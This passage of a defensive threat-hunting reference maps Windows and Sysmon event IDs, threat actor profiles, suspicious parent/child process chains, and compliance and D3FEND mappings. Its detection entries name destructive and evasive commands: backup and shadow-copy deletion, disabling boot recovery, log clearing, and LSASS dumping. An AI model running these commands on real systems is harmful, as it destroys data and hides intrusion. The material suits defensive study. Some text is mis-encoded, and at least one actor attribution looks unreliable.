4776 Security NTLM Authentication Authentication Domain controller validated credentials over NTLM. Status 0xC0000064 (no such user), 0xC000006A (bad password), 0xC0000234 (locked). NTLM use for high-privilege accounts. TargetUserName, Workstation, Status Info
5136 Security AD Object Modified AD Activity A directory service object was modified. Modifications to nTSecurityDescriptor on domain root (DCSync rights grants). Changes to GPOs from unusual sources. ObjectDN, AttributeLDAPDisplayName, AttributeValue, SubjectUserName Medium
5145 Security Detailed File Share Access File Share A network share object was accessed with detailed audit info. Access to IPC$ share with named pipes (lsarpc, samr, efsrpc) = coerced authentication / PetitPotam patterns. ShareName, RelativeTargetName, IpAddress, AccessMask Low
1102 Security Audit Log Cleared Defense Evasion The audit log was cleared. ALWAYS investigate. Should be extremely rare in normal operation. Often precedes or follows attacker actions. SubjectUserName Critical
104 System Event Log Cleared (System) Defense Evasion A System event log file was cleared. Same investigation priority as 1102. Sometimes the System log contains evidence the attacker wants to remove. SubjectUserName, Channel Critical
7045 System New Service Installed Persistence A service was installed on the system. Service names PSEXESVC, PAExec, RemCom (lateral movement). ImagePath in Temp/Public/AppData. Cmd.exe or PowerShell directly in the ImagePath. ServiceName, ImagePath, ServiceType, StartType Medium
7034 System Service Crashed Unexpectedly Defense Evasion A service terminated unexpectedly. Crashes of security/EDR services (Defender, CrowdStrike, SentinelOne) โ€” could indicate tampering. ServiceName, CrashCount Medium
7036 System Service Status Change Service Activity A service entered the running or stopped state. Security services being stopped. Known PsExec/lateral movement service names starting up. ServiceName, NewState Low
4103 PowerShell/Operational Module Logging PowerShell PowerShell module pipeline execution recorded. Pipeline data may contain decoded malicious commands. Requires Module Logging GPO enabled. ContextInfo, Payload, UserId Info
4104 PowerShell/Operational Script Block Logging PowerShell Captured script block (most useful PS log). Decoded EncodedCommand contents appear here. Mimikatz signatures, Invoke-Expression chains, AMSI bypass attempts. ENABLE THIS via GPO. ScriptBlockText, Path, MessageNumber, MessageTotal Info (high-value)
4105 PowerShell/Operational Script Block Started PowerShell Indicates the start of a PowerShell script block invocation. Useful for correlating start-times of script execution with other events. ScriptBlockId, ProcessId Info
1 Sysmon Process Create Process Activity Process creation with rich detail (hash, parent image, GUID, integrity). Same as 4688 + file hashes for known-bad lookups, ParentProcessGuid for accurate tree reconstruction, OriginalFileName (defeats simple renames). Image, CommandLine, ParentImage, Hashes, OriginalFileName, IntegrityLevel Info (volume)
2 Sysmon File Creation Time Changed Defense Evasion A process changed a file's creation time (timestomping). Processes other than backup/install tools modifying file timestamps = anti-forensics indicator. Image, TargetFilename, CreationUtcTime, PreviousCreationUtcTime Medium
3 Sysmon Network Connection Network Activity A process established a network connection. PowerShell, certutil, regsvr32 making outbound connections. Connections to public IPs from system-context services. Image, DestinationIp, DestinationPort, DestinationHostname, User Info (volume)
5 Sysmon Process Terminated Process Activity A process terminated. Pair with EID 1 to compute process lifetime. Very short-lived processes can indicate scripted execution. Image, ProcessGuid, UtcTime Info
7 Sysmon Image Loaded (DLL) Process Activity A DLL was loaded by a process. Unsigned DLLs in user-writable paths. DLL sideloading patterns (legit signed binary loading malicious DLL from same dir). Volume-heavy โ€” filter aggressively. Image, ImageLoaded, Hashes, Signed, Signature Info (very high volume)
8 Sysmon CreateRemoteThread Defense Evasion A process created a thread in another process (process injection). Threads injected into lsass.exe = credential theft. Threads injected into svchost/explorer = malware persistence/hiding. Very low FP rate when filtered. SourceImage, TargetImage, NewThreadId, StartAddress High
10 Sysmon ProcessAccess Credential Access A process opened a handle to another process. Anything opening handles to lsass.exe with GrantedAccess 0x1410 or 0x1010 = LSASS dumping. Known dumpers, but also custom tools. SourceImage, TargetImage, GrantedAccess, CallTrace High (when targeting lsass)
11 Sysmon FileCreate File Activity A file was created. Executables in unusual paths (Temp, AppData). Ransomware extensions (.locked, .cry, .enc). Known ransom note filenames. Image, TargetFilename, CreationUtcTime Info (volume)
12 Sysmon RegistryEvent (Object) Persistence Registry key/value created or deleted. Run/RunOnce keys. UAC bypass keys (HKCU\Software\Classes\ms-settings). AppInit_DLLs. TargetObject, EventType, Image Medium
13 Sysmon RegistryEvent (Value Set) Persistence A registry value was set. Same paths as EID 12 plus the actual values written. Persistence values pointing to user-writable executables. TargetObject, Details, Image Medium
15 Sysmon FileCreateStreamHash File Activity Alternate Data Stream (ADS) was created. Captures Mark of the Web. Files with Zone.Identifier ADS = downloaded from internet. Combine with EID 1 to track downloaded payload execution. TargetFilename, Hash, Contents Low
17 Sysmon PipeEvent (Created) C2 / Lateral A named pipe was created. Cobalt Strike default pipe names (msagent_, MSSE-, postex_, status_). Suspicious lateral movement pipes (PSEXESVC). PipeName, Image Medium
18 Sysmon PipeEvent (Connected) C2 / Lateral A client connected to a named pipe. Same pipe name patterns as EID 17 + visibility into who connected. PipeName, Image Medium
22 Sysmon DNS Query Network Activity A process performed a DNS query. Queries to known C2 domains. Long subdomain queries (DNS tunneling). Queries to recently-registered domains. QueryName, QueryStatus, QueryResults, Image Info (volume)
23 Sysmon FileDelete (Archived) Defense Evasion A file was deleted; Sysmon archives a copy. Mass deletion of attacker artifacts. Self-deletion of dropper executables. Image, TargetFilename, IsExecutable Medium
25 Sysmon Process Tampering Defense Evasion Process image tampered (process hollowing/herpaderping). Any hit is a strong indicator of process injection / hollowing. Low FP rate. Image, Type Critical
29 Sysmon FileExecutableDetected Defense Evasion An executable file was created (Sysmon 15.10+). PE files dropped to user-writable directories. Use to short-circuit hunting on net-new payloads. Image, TargetFilename, Hash Medium

๐ŸŽฏ Threat Actor Profiles 18 groups

Profiles of 18 of the most relevant threat actors active today. Includes nation-state APTs (APT29, APT28, APT41, Volt Typhoon, Sandworm, Lazarus, Mustang Panda, Kimsuky, etc.), high-impact cybercrime groups (FIN7, Scattered Spider, Lapsus$, Cl0p), and major ransomware operators (Conti, BlackBasta, ALPHV, LockBit). Each includes targets, notable operations, top techniques, and tooling/IOCs. Click any card to expand.

APT29 (Cozy Bear / Midnight Blizzard)

Nation-State
Origin: Russia (SVR) Active since: 2008

Targets

Government, diplomatic, defense contractors, technology, healthcare

Notable Operations

SolarWinds supply chain attack (2020), Microsoft password spray (Jan 2024), DNC hack

Top Techniques

T1078 Valid AccountsT1098 Account ManipulationT1195 Supply ChainT1566 PhishingT1059.001 PowerShellT1114 Email Collection

Tooling / IOCs

Custom malware: WellMess, WellMail, GoldFinder, Sibot, GoldMax, FoggyWeb. Known for using legitimate cloud services for C2.

APT28 (Fancy Bear / Forest Blizzard)

Nation-State
Origin: Russia (GRU) Active since: 2007

Targets

Government, military, defense contractors, political organizations, journalists

Notable Operations

DNC hack (2016), TV5Monde, German Bundestag, IOC anti-doping leaks, OUTLOOK CVE-2023-23397 mass exploitation

Top Techniques

T1566.001 Spearphishing AttachmentT1190 Exploit Public-FacingT1110 Brute ForceT1059.003 Windows CmdT1003.001 LSASS

Tooling / IOCs

X-Agent, X-Tunnel, Sednit, Sofacy, Zebrocy, ROADSWEEP. CVE-2023-23397 (NTLM relay via Outlook).

APT41 (Wicked Panda / Brass Typhoon)

Nation-State + Cybercrime
Origin: China (MSS) Active since: 2012

Targets

Healthcare, telecom, technology, video games, governments โ€” uniquely both espionage AND financial

Notable Operations

DOJ indicted 5 members in 2020. Compromised 100+ companies. Attended Black Hat conferences in disguise.

Top Techniques

T1190 Exploit Public-FacingT1505.003 Web ShellT1027 Obfuscated FilesT1547.001 Run KeysT1003 OS Credential Dumping

Tooling / IOCs

Custom backdoors: CROSSWALK, SOGU, HIGHNOON, CHINACHOPPER. Known for using stolen game certificates to sign malware.

Volt Typhoon

Nation-State
Origin: China (PLA-affiliated) Active since: 2021

Targets

US critical infrastructure (energy, water, transport, comms) โ€” pre-positioning for conflict

Notable Operations

May 2023 Microsoft/CISA advisory. Living-off-the-land focus, deliberately quiet long-term access. 'Pre-positioning' in Guam infrastructure for potential Taiwan conflict.

Top Techniques

T1133 External Remote Services (Fortinet)T1059.003 cmd.exeT1078 Valid AccountsT1003.003 NTDST1090 Proxy (residential proxies)

Tooling / IOCs

Almost no custom malware โ€” pure LOLBin. Uses ntdsutil, Mimikatz, PsExec, Impacket. Compromised SOHO routers for proxy.

Sandworm (Voodoo Bear)

Nation-State
Origin: Russia (GRU 74455) Active since: 2009

Targets

Ukraine (especially), critical infrastructure, election systems, NATO

Notable Operations

BlackEnergy/Industroyer Ukraine grid attacks (2015, 2016), NotPetya ($10B damage), 2018 Olympics, ongoing Ukraine war operations

Top Techniques

T1486 Data Encrypted for ImpactT1561 Disk WipeT1190 Exploit Public-FacingT1059 Command/ScriptingT1485 Data Destruction

Tooling / IOCs

BlackEnergy, Industroyer/CrashOverride, NotPetya, Olympic Destroyer, AcidRain (Viasat), CaddyWiper. Often attribution-confused with Telebots.

Lazarus Group

Nation-State + Financial
Origin: North Korea (RGB) Active since: 2009

Targets

Banks, cryptocurrency exchanges, defense contractors, entertainment, healthcare

Notable Operations

Sony Pictures (2014), Bangladesh Bank SWIFT $81M (2016), WannaCry (2017), Ronin Bridge $620M crypto (2022), 3CX supply chain (2023)

Top Techniques

T1566 PhishingT1059.001 PowerShellT1027 ObfuscatedT1486 Encrypted for Impact (WannaCry)T1574 Hijack Execution Flow

Tooling / IOCs

WannaCry, AppleJeus, FALLCHILL, MATA, BLINDINGCAN, AsymCrypt. Known for fake job interviews delivering malware to crypto/defense engineers.

FIN7 (Carbanak Group)

Cybercrime
Origin: Russia/Ukraine Active since: 2013

Targets

Restaurants, hospitality, gaming (POS systems), retail

Notable Operations

Stole 15M+ payment cards from 100+ US companies. Operated as fake cybersecurity firm 'Combi Security' to recruit unwitting pentesters.

Top Techniques

T1566.001 Spearphishing AttachmentT1059.005 VBST1547.001 Run KeysT1056.002 GUI Input CaptureT1005 Local System Data

Tooling / IOCs

Carbanak, GRIFFON, BABYMETAL, BOOSTWRITE, RDFSNIFFER. Known for elaborate phishing using social engineering of specific individuals.

Scattered Spider (UNC3944, Octo Tempest)

Cybercrime
Origin: US/UK (English-speaking) Active since: 2022

Targets

Telecom, BPO, casinos, technology, financial โ€” anything with help-desk leverage

Notable Operations

MGM Resorts, Caesars, Reddit, Twilio, Microsoft 365 partner ecosystem. Known for SIM-swap and help-desk social engineering.

Top Techniques

T1566.004 Voice PhishingT1078 Valid AccountsT1539 Web CookiesT1199 Trusted RelationshipT1486 Encryption (BlackCat affiliate)

Tooling / IOCs

Uses BlackCat/ALPHV ransomware as affiliate. RMM tools (TeamViewer, AnyDesk, Splashtop). Very fluent English social engineering.

Lapsus$ (Strawberry Tempest)

Cybercrime / Hacktivist
Origin: UK/Brazil Active since: 2021

Targets

Tech giants โ€” for clout. Microsoft, NVIDIA, Samsung, Okta, Uber, Rockstar.

Notable Operations

Compromised Okta authentication provider. Stole GTA VI source code. Most members were teenagers; UK arrests in 2022.

Top Techniques

T1078 Valid Accounts (purchased from infostealers)T1556 Modify Auth ProcessT1199 Trusted RelationshipT1003 LSASS (post-foothold)

Tooling / IOCs

Heavy reliance on infostealer logs (Russian Market, Genesis). MFA fatigue spam to bypass push notifications. Public Telegram channel.

Conti / TrickBot Group

Cybercrime (Ransomware)
Origin: Russia Active since: 2017 (TrickBot), 2020 (Conti)

Targets

Healthcare, government, industrial โ€” opportunistic, big-game hunting

Notable Operations

Costa Rica national emergency (2022), Ireland HSE health system (2021). Internal chats leaked Feb 2022 โ€” 'ContiLeaks' revealed full org structure.

Top Techniques

T1566 Phishing (BazarLoader)T1059.001 PowerShell (PowerSploit)T1003.001 LSASST1486 Encrypted for Impact

Tooling / IOCs

Conti ransomware, BazarLoader, TrickBot, Cobalt Strike. Group has rebranded multiple times: Ryuk โ†’ Conti โ†’ BlackBasta โ†’ others.

BlackBasta

Cybercrime (Ransomware)
Origin: Russia (Conti spin-off) Active since: 2022

Targets

Industrial, manufacturing, healthcare, government

Notable Operations

Hyundai Europe, Capita UK ($26M ransom), Ascension Health (US). Estimated $107M+ in ransom payments by 2024.

Top Techniques

T1566 Phishing (Qakbot)T1190 Exploit Public-FacingT1059.001 PowerShellT1486 Encrypted for Impact

Tooling / IOCs

BlackBasta ransomware, Qakbot, Brute Ratel, Cobalt Strike. Recently shifted to using Microsoft Teams as initial access (impersonating IT support).

ALPHV / BlackCat

Cybercrime (RaaS)
Origin: Russia (REvil/DarkSide spin-off) Active since: 2021

Targets

Healthcare, financial, government, energy

Notable Operations

Change Healthcare attack (Feb 2024) โ€” paid $22M, then exit-scammed affiliate. MGM Resorts (with Scattered Spider). Reddit, Western Digital.

Top Techniques

T1566 PhishingT1190 Exploit Public-FacingT1078 Valid AccountsT1486 Encrypted for Impact

Tooling / IOCs

ALPHV/BlackCat ransomware (written in Rust โ€” first major ransomware in Rust). Triple extortion: encrypt + leak + DDoS.

LockBit

Cybercrime (RaaS)
Origin: Russia Active since: 2019

Targets

Indiscriminate โ€” manufacturing, retail, professional services, government

Notable Operations

Most prolific ransomware of 2022-2023. UK NHS, ICBC, Boeing. Operation Cronos international takedown in Feb 2024 โ€” but resumed operations within days.

Top Techniques

T1190 Exploit Public-FacingT1078 Valid AccountsT1059 Command/ScriptingT1490 Inhibit RecoveryT1486 Encrypted for Impact

Tooling / IOCs

LockBit 2.0, 3.0, Black, Green ransomware variants. Self-spreading SMB worm capability. Run as RaaS with affiliate program.

Cl0p (TA505)

Cybercrime
Origin: Russia Active since: 2014

Targets

Mass exploitation of file transfer products โ€” Accellion FTA, GoAnywhere, MOVEit

Notable Operations

MOVEit Transfer mass exploitation (June 2023) โ€” 2,700+ organizations, 95M+ individuals affected. Currently the most commercially successful extortion campaign.

Top Techniques

T1190 Exploit Public-Facing (zero-days)T1505.003 Web ShellT1530 Cloud StorageT1567 Exfil to Cloud

Tooling / IOCs

Cl0p ransomware (often skipped โ€” pure data extortion). LEMURLOOT web shell. Strategy: zero-day โ†’ exfil at scale โ†’ name on leak site.

Mustang Panda (Earth Preta, Bronze President)

Nation-State
Origin: China Active since: 2017

Targets

Southeast Asian governments, NGOs, religious organizations (especially Vatican)

Notable Operations

Sustained ASEAN government targeting. Heavy use of weaponized USB drives in physical-air-gap attacks.

Top Techniques

T1566.001 Spearphishing AttachmentT1091 Replication via Removable MediaT1547.009 Shortcut ModificationT1059.001 PowerShell

Tooling / IOCs

PlugX (Korplug), Toneshell, Hodur, MQsTTang. Known for using Vatican-themed lures.

Kimsuky (APT43)

Nation-State
Origin: North Korea (RGB) Active since: 2012

Targets

South Korea, Japan, US โ€” think tanks, foreign policy researchers, journalists, defectors, nuclear policy

Notable Operations

Extensive credential-harvesting campaigns. Very persistent against individual targets โ€” multi-month engagement of single researcher.

Top Techniques

T1566.002 Spearphishing LinkT1539 Steal Web Session CookieT1114 Email CollectionT1056.001 Keylogging

Tooling / IOCs

BabyShark, GREASE, FlowerPower. Known for impersonating journalists and academics in initial outreach.

Charming Kitten (APT35)

Nation-State
Origin: Iran (IRGC) Active since: 2014

Targets

Government, journalists, US/UK/Israel critics of Iran, dissidents, academics

Notable Operations

Extensive use of fake personas (e.g., 'Mia Ash' fake recruiter). 2020 US presidential election interference. Microsoft account targeting at scale.

Top Techniques

T1566.002 Spearphishing LinkT1583.001 Acquire DomainsT1078.004 Cloud AccountsT1539 Web Cookies

Tooling / IOCs

POWERSTATS, MeshAgent, custom infrastructure resembling legitimate sites. Known for fake LinkedIn recruiter personas.

MuddyWater (Mango Sandstorm)

Nation-State
Origin: Iran (MOIS) Active since: 2017

Targets

Telecom, government, energy across Middle East, US allies

Notable Operations

Heavily uses commercial RMM tools (ConnectWise, Atera, AnyDesk) to maintain access โ€” 'living off the land' on the management plane.

Top Techniques

T1566.001 Spearphishing AttachmentT1059.001 PowerShellT1219 Remote Access SoftwareT1003.001 LSASS

Tooling / IOCs

POWGOOP, SmallSieve, MORI, PhonyC2. Custom PowerShell frameworks. Pivots to commercial RMM after foothold.

๐ŸŒณ Parent/Child Process Anomaly Cheat Sheet 44 entries

Quick-reference table of suspicious process lineages โ€” the parent-spawn-child relationships that indicate compromise. Filter by verdict severity. The classic winword.exe โ†’ powershell.exe pattern, plus dozens of others.

44 of 44
Parent Child Verdict Context Tactic
winword.exe โ†’ powershell.exe Highly Suspicious Office macro launching PowerShell โ€” classic phishing payload chain Initial Access / Execution
winword.exe โ†’ cmd.exe Highly Suspicious Office macro spawning shell โ€” phishing payload Initial Access / Execution
winword.exe โ†’ wscript.exe Highly Suspicious Office launching Windows Scripting Host โ€” common in macro-dropped JS/VBS payloads Initial Access / Execution
winword.exe โ†’ mshta.exe Highly Suspicious Office launching HTA file โ€” script execution evasion Initial Access / Defense Evasion
winword.exe โ†’ rundll32.exe Highly Suspicious Office macro using rundll32 to load malicious DLL Initial Access / Execution
excel.exe โ†’ powershell.exe Highly Suspicious Excel macro launching PowerShell โ€” same threat as Word Initial Access / Execution
excel.exe โ†’ cmd.exe Highly Suspicious Excel macro spawning shell Initial Access / Execution
outlook.exe โ†’ powershell.exe Highly Suspicious Outlook spawning PowerShell โ€” typically from malicious attachment auto-execution Initial Access / Execution
outlook.exe โ†’ wscript.exe Highly Suspicious Outlook spawning script host โ€” opened malicious attachment Initial Access / Execution
outlook.exe โ†’ rundll32.exe Highly Suspicious Outlook spawning rundll32 โ€” DLL-based payload from attachment Initial Access / Execution
w3wp.exe โ†’ cmd.exe Critical IIS spawning shell โ€” web shell exploitation, near-certain compromise Initial Access (Web Exploit)
w3wp.exe โ†’ powershell.exe Critical IIS spawning PowerShell โ€” web shell Initial Access (Web Exploit)
w3wp.exe โ†’ whoami.exe Critical IIS running recon commands โ€” post-exploitation Discovery
httpd.exe โ†’ cmd.exe Critical Apache spawning shell โ€” exploit/web shell Initial Access (Web Exploit)
nginx.exe โ†’ cmd.exe Critical nginx spawning shell โ€” exploit/web shell Initial Access (Web Exploit)
tomcat.exe โ†’ cmd.exe Critical Tomcat spawning shell โ€” Java-based RCE / web shell Initial Access (Web Exploit)
java.exe โ†’ cmd.exe Critical Java app spawning shell โ€” Log4Shell-style RCE Initial Access (Web Exploit)
sqlservr.exe โ†’ cmd.exe Critical MSSQL xp_cmdshell or similar โ€” DB exploitation Initial Access / Execution
sqlservr.exe โ†’ powershell.exe Critical SQL Server launching PowerShell via xp_cmdshell or OLE Automation Initial Access / Execution
lsass.exe โ†’ cmd.exe Critical LSASS should never spawn children. Indicates code injection or exploit. Privilege Escalation
lsass.exe โ†’ * Critical LSASS should NEVER spawn child processes โ€” any child is suspect Privilege Escalation
services.exe โ†’ cmd.exe Suspicious services.exe directly spawning shell โ€” except for a small set of legit services Persistence / Lateral
services.exe โ†’ powershell.exe Suspicious services.exe spawning PowerShell โ€” typically a malicious service Persistence
winlogon.exe โ†’ cmd.exe Critical winlogon spawning shell โ€” bypass / debugger hijack Persistence / Priv Esc
powershell.exe โ†’ powershell.exe Suspicious PowerShell launching PowerShell โ€” sometimes legit, often used to evade logging or restrictions Execution / Defense Evasion
powershell.exe โ†’ cmd.exe Suspicious PowerShell spawning cmd โ€” context-dependent. Common in attacker scripts. Execution
powershell.exe โ†’ rundll32.exe Suspicious PowerShell using rundll32 โ€” DLL execution / injection Defense Evasion
rundll32.exe โ†’ cmd.exe Suspicious rundll32 launching shell โ€” typical of UAC bypass and post-injection workflows Defense Evasion / Priv Esc
regsvr32.exe โ†’ powershell.exe Highly Suspicious regsvr32 โ†’ powershell โ€” Squiblydoo + post-exploit Execution / Defense Evasion
mshta.exe โ†’ powershell.exe Highly Suspicious HTA file launching PowerShell โ€” script-host abuse Execution
wscript.exe โ†’ powershell.exe Highly Suspicious VBS/JS launching PowerShell โ€” phishing payload pattern Execution
cscript.exe โ†’ powershell.exe Highly Suspicious CScript launching PowerShell โ€” same as wscript Execution
explorer.exe โ†’ powershell.exe Context-Dependent User running PowerShell from Explorer (Win+R) is normal. CommandLine flags determine suspicion. Execution (often legit)
explorer.exe โ†’ cmd.exe Context-Dependent User running cmd from Explorer is normal. Investigate the command line. Execution (often legit)
msbuild.exe โ†’ powershell.exe Suspicious MSBuild executing inline tasks calling PowerShell โ€” common attacker LOLBin chain Execution / Defense Evasion
schtasks.exe โ†’ powershell.exe Suspicious Task scheduler running PowerShell scripts โ€” could be legitimate, but verify the task source Persistence / Execution
wmic.exe โ†’ powershell.exe Highly Suspicious WMI process call create launching PowerShell โ€” typical lateral movement / execution Execution / Lateral Movement
psexec.exe โ†’ * Suspicious PsExec is sysadmin tool โ€” legitimate from jump boxes only. From end-user hosts = lateral movement. Lateral Movement
psexesvc.exe โ†’ * Suspicious Server-side of PsExec โ€” confirms lateral inbound. Investigate what spawned next. Lateral Movement
* โ†’ vssadmin.exe Highly Suspicious vssadmin called by anything other than backup software โ€” typically pre-ransomware shadow deletion Impact
* โ†’ wbadmin.exe Highly Suspicious wbadmin delete catalog โ€” pre-ransomware backup destruction Impact
* โ†’ bcdedit.exe Highly Suspicious bcdedit /set recoveryenabled No โ€” pre-ransomware boot options tampering Impact
* โ†’ cipher.exe Suspicious cipher /w (wipe free space) outside scheduled cleanup โ€” anti-forensics Defense Evasion
* โ†’ wevtutil.exe Suspicious wevtutil cl (clear log) โ€” log clearing, pair with Event 1102/104 Defense Evasion

โš–๏ธ DoD 8140 / NIST 800-53 / CMMC Compliance Mappings 20 techniques

Maps each MITRE ATT&CK technique to the relevant NIST SP 800-53 Rev 5 security controls, CMMC Level 2 practices, and DoD 8140 work roles. This is a strong cleared-environment differentiator because it connects technical detection skill to compliance language used in DoD environments. In interviews you can demonstrate compliance fluency alongside technical detection skill.

20 of 20
T1078 Valid Accounts
NIST SP 800-53
AC-2 Account ManagementAC-6 Least PrivilegeIA-2 Identification and AuthenticationAU-12 Audit Generation
CMMC Level 2
AC.L2-3.1.1AC.L2-3.1.5IA.L2-3.5.1AU.L2-3.3.1
DoD 8140 Work Roles
541 Vulnerability Assessment Analyst511 Cyber Defense Analyst
T1059 Command and Scripting Interpreter
NIST SP 800-53
SI-3 Malicious Code ProtectionSI-4 System MonitoringCM-7 Least FunctionalityAU-2 Audit Events
CMMC Level 2
SI.L1-3.14.1SI.L1-3.14.2CM.L2-3.4.7AU.L2-3.3.1
DoD 8140 Work Roles
531 Cyber Defense Incident Responder511 Cyber Defense Analyst
T1190 Exploit Public-Facing Application
NIST SP 800-53
SI-2 Flaw RemediationSC-7 Boundary ProtectionSI-4 System MonitoringRA-5 Vulnerability Scanning
CMMC Level 2
SI.L1-3.14.1SC.L1-3.13.1SI.L2-3.14.5RA.L2-3.11.2
DoD 8140 Work Roles
541 Vulnerability Assessment Analyst511 Cyber Defense Analyst
T1566 Phishing
NIST SP 800-53
AT-2 Security Awareness TrainingSI-3 Malicious Code ProtectionSC-44 Detonation Chambers
CMMC Level 2
AT.L2-3.2.1SI.L1-3.14.1SI.L1-3.14.2
DoD 8140 Work Roles
531 Cyber Defense Incident Responder541 Vulnerability Assessment Analyst
T1003 OS Credential Dumping
NIST SP 800-53
IA-5 Authenticator ManagementAC-6 Least PrivilegeSI-4 System MonitoringSC-39 Process Isolation
CMMC Level 2
IA.L2-3.5.7AC.L2-3.1.5SI.L2-3.14.6
DoD 8140 Work Roles
531 Cyber Defense Incident Responder511 Cyber Defense Analyst
T1486 Data Encrypted for Impact
NIST SP 800-53
CP-9 System BackupCP-10 System RecoverySI-4 System MonitoringIR-4 Incident Handling
CMMC Level 2
CP.L2-3.8.9RE.L2-3.13.16SI.L2-3.14.6IR.L2-3.6.1
DoD 8140 Work Roles
531 Cyber Defense Incident Responder532 Cyber Defense Forensics Analyst
T1547.001 Registry Run Keys
NIST SP 800-53
CM-7 Least FunctionalitySI-4 System MonitoringAU-2 Audit Events
CMMC Level 2
CM.L2-3.4.7SI.L2-3.14.6AU.L2-3.3.1
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1053 Scheduled Task/Job
NIST SP 800-53
CM-7 Least FunctionalityAC-6 Least PrivilegeSI-4 System Monitoring
CMMC Level 2
CM.L2-3.4.7AC.L2-3.1.5SI.L2-3.14.6
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1021 Remote Services
NIST SP 800-53
AC-17 Remote AccessIA-2 Identification and AuthenticationSC-7 Boundary Protection
CMMC Level 2
AC.L2-3.1.12AC.L2-3.1.13IA.L2-3.5.3
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1562 Impair Defenses
NIST SP 800-53
SI-4 System MonitoringSI-7 Software/Firmware IntegrityAU-9 Protection of Audit InfoCM-5 Access Restrictions
CMMC Level 2
SI.L2-3.14.6SI.L2-3.14.7AU.L2-3.3.8CM.L2-3.4.5
DoD 8140 Work Roles
531 Cyber Defense Incident Responder
T1027 Obfuscated Files or Information
NIST SP 800-53
SI-3 Malicious Code ProtectionSI-4 System MonitoringCM-7 Least Functionality
CMMC Level 2
SI.L1-3.14.2SI.L2-3.14.6
DoD 8140 Work Roles
511 Cyber Defense Analyst541 Vulnerability Assessment Analyst
T1071 Application Layer Protocol
NIST SP 800-53
SC-7 Boundary ProtectionSI-4 System MonitoringAC-4 Information Flow Enforcement
CMMC Level 2
SC.L1-3.13.1SI.L2-3.14.6AC.L2-3.1.3
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1567 Exfiltration Over Web Service
NIST SP 800-53
SC-7 Boundary ProtectionSI-4 System MonitoringAC-4 Information Flow EnforcementAU-12 Audit Generation
CMMC Level 2
SC.L1-3.13.1AC.L2-3.1.3AU.L2-3.3.1
DoD 8140 Work Roles
531 Cyber Defense Incident Responder
T1490 Inhibit System Recovery
NIST SP 800-53
CP-9 System BackupCP-10 System RecoverySI-4 System Monitoring
CMMC Level 2
CP.L2-3.8.9RE.L2-3.13.16
DoD 8140 Work Roles
531 Cyber Defense Incident Responder
T1110 Brute Force
NIST SP 800-53
IA-5 Authenticator ManagementAC-7 Unsuccessful Logon AttemptsSI-4 System Monitoring
CMMC Level 2
IA.L2-3.5.7AC.L2-3.1.8SI.L2-3.14.6
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1558 Steal/Forge Kerberos Tickets
NIST SP 800-53
IA-5 Authenticator ManagementAC-6 Least PrivilegeAU-2 Audit Events
CMMC Level 2
IA.L2-3.5.7AC.L2-3.1.5AU.L2-3.3.1
DoD 8140 Work Roles
511 Cyber Defense Analyst531 Cyber Defense Incident Responder
T1003.006 DCSync
NIST SP 800-53
AC-6 Least PrivilegeAU-2 Audit EventsSI-4 System MonitoringAC-3 Access Enforcement
CMMC Level 2
AC.L2-3.1.5AU.L2-3.3.1SI.L2-3.14.6
DoD 8140 Work Roles
531 Cyber Defense Incident Responder
T1649 Steal/Forge Authentication Certs (ADCS)
NIST SP 800-53
IA-5 Authenticator ManagementSC-17 PKI CertificatesAU-2 Audit Events
CMMC Level 2
IA.L2-3.5.7SC.L2-3.13.10
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1098 Account Manipulation
NIST SP 800-53
AC-2 Account ManagementAU-12 Audit GenerationAC-6 Least Privilege
CMMC Level 2
AC.L2-3.1.1AU.L2-3.3.1AC.L2-3.1.5
DoD 8140 Work Roles
511 Cyber Defense Analyst
T1105 Ingress Tool Transfer
NIST SP 800-53
SC-7 Boundary ProtectionSI-3 Malicious Code ProtectionSI-4 System Monitoring
CMMC Level 2
SC.L1-3.13.1SI.L1-3.14.2SI.L2-3.14.6
DoD 8140 Work Roles
511 Cyber Defense Analyst531 Cyber Defense Incident Responder

๐Ÿ›ก๏ธ MITRE D3FEND Defensive Mappings 18 techniques

For each ATT&CK offensive technique, the corresponding MITRE D3FEND defensive countermeasures. D3FEND categorizes defenses into Harden (prevent), Detect (find), Isolate (contain), Evict (remove), and Restore (recover). Use this view to demonstrate that your detection coverage maps to a complete defensive posture.

18 of 18
T1078 Valid Accounts
D3-MFA Multi-factor Authentication Harden
D3-ANAA Authentication Cache Invalidation Evict
D3-UBA User Behavior Analysis Detect
D3-UDTA User Data Transfer Analysis Detect
T1059 Command and Scripting Interpreter
D3-EAL Executable Allowlisting Harden
D3-PSA Process Spawn Analysis Detect
D3-SCA System Call Analysis Detect
D3-SSA Shell Session Activity Analysis Detect
T1190 Exploit Public-Facing Application
D3-AH Application Hardening Harden
D3-NTA Network Traffic Analysis Detect
D3-WAF Web Application Firewall Isolate
D3-IPCTF IP-based Network Traffic Filtering Isolate
T1566 Phishing
D3-MA Message Authentication (DKIM/SPF/DMARC) Harden
D3-MFA Multi-factor Authentication Harden
D3-MENCR Message Encryption Harden
D3-MAA Message Analysis Detect
T1003 OS Credential Dumping
D3-CH Credential Hardening Harden
D3-PA Process Analysis Detect
D3-MA Memory Analysis Detect
D3-CGUARD Credential Guard / Memory Protection Harden
T1486 Data Encrypted for Impact
D3-FBA File Backup Authorization Harden
D3-FA File Analysis Detect
D3-FCD File Content Detonation Detect
D3-RD Restore Data (Backups) Restore
T1547.001 Registry Run Keys
D3-RA Registry Analysis Detect
D3-FBA File Behavior Analysis Detect
D3-PA Process Analysis Detect
T1053 Scheduled Task/Job
D3-SJA Scheduled Job Analysis Detect
D3-PA Process Analysis Detect
D3-EAL Executable Allowlisting Harden
T1021 Remote Services
D3-MFA Multi-factor Authentication Harden
D3-NTA Network Traffic Analysis Detect
D3-IBCA Inbound Connection Analysis Detect
D3-NTF Network Traffic Filtering Isolate
T1562 Impair Defenses
D3-PA Process Analysis Detect
D3-SSC System Service Configuration Harden
D3-LFP Local File Permissions Harden
D3-SICA System Init Config Analysis Detect
T1027 Obfuscated Files or Information
D3-FA File Analysis Detect
D3-FCA File Content Analysis Detect
D3-FCDC File Carving Detect
D3-DA Dynamic Analysis (Sandbox) Detect
T1071 Application Layer Protocol
D3-NTA Network Traffic Analysis Detect
D3-DNSDL DNS Denylisting Isolate
D3-CA Connection Attempt Analysis Detect
D3-PHDURA Protocol Header Discrepancy Analysis Detect
T1567 Exfiltration Over Web Service
